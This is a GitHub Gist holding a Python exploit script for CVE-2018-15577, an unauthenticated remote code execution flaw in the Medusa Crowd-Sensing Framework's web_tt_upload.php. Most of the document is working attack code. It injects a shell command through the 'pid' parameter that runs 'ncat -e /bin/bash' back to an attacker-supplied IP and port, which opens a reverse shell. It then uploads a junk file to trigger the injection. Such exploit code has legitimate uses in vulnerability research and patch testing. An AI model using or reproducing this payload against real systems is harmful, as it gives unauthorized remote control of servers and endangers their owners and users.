Created
August 20, 2018 15:56
-
-
Save mhaskar/33b5b78b4391bda83b64e387c7221e29 to your computer and use it in GitHub Desktop.
Unauthenticated RCE - Medusa Crowd-Sensing Framework (CVE-2018-15577)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| ''' | |
| # Exploit Title: Medusa Crowd-Sensing Framework "web_tt_upload.php" Unauthenticated RCE | |
| # Date: 16/08/2018 | |
| # Exploit Author: Askar (@mohammadaskar2) | |
| # CVE : CVE-2018-15577 - RESERVED | |
| # Vendor Homepage: https://github.com/USC-NSL/Medusa/ | |
| # Version: V1.0 | |
| # Tested on: Ubuntu 16.04 / PHP 7.0.28 | |
| ''' | |
| import requests | |
| import sys | |
| import os | |
| if len(sys.argv) != 4: | |
| print "[+] Usage : ./exploit.py url local_ip local_port" | |
| sys.exit(0) | |
| url = sys.argv[1] | |
| ip = sys.argv[2] | |
| port = sys.argv[3] | |
| payload = "?pid=| ncat%20-e%20%2Fbin%2Fbash%20{0}%20{1}%20%23".format(ip, port) | |
| full_url = url + payload | |
| # create a file with some junk data to send | |
| os.system("echo 111 > /tmp/medusa-exploit.txt") | |
| files = {'uploadedfile': open("/tmp/medusa-exploit.txt", "rb")} | |
| print "[+]Sending Payload , check your shell !" | |
| requests.post(full_url, files=files) | |
| # remove the created file | |
| os.system("rm /tmp/medusa-exploit.txt") | |
| print "[+]Temp file removed !" |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment